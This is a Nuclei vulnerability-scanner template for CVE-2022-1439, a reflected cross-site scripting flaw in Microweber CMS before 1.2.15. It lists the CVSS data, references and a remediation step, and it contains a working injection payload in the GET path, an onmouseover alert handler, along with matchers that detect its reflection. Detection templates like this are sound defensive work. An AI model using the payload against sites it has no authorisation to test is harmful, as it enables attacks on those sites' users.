nuclei-templates/http/cves/2022/CVE-2022-1439.yaml

47 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2022-1439
info:
name: Microweber <1.2.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
reference:
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0
- https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1439
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.00113
epss-percentile: 0.44027
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: microweber
product: microweber
2023-09-06 11:59:08 +00:00
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,xss,huntr
http:
- method: GET
path:
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200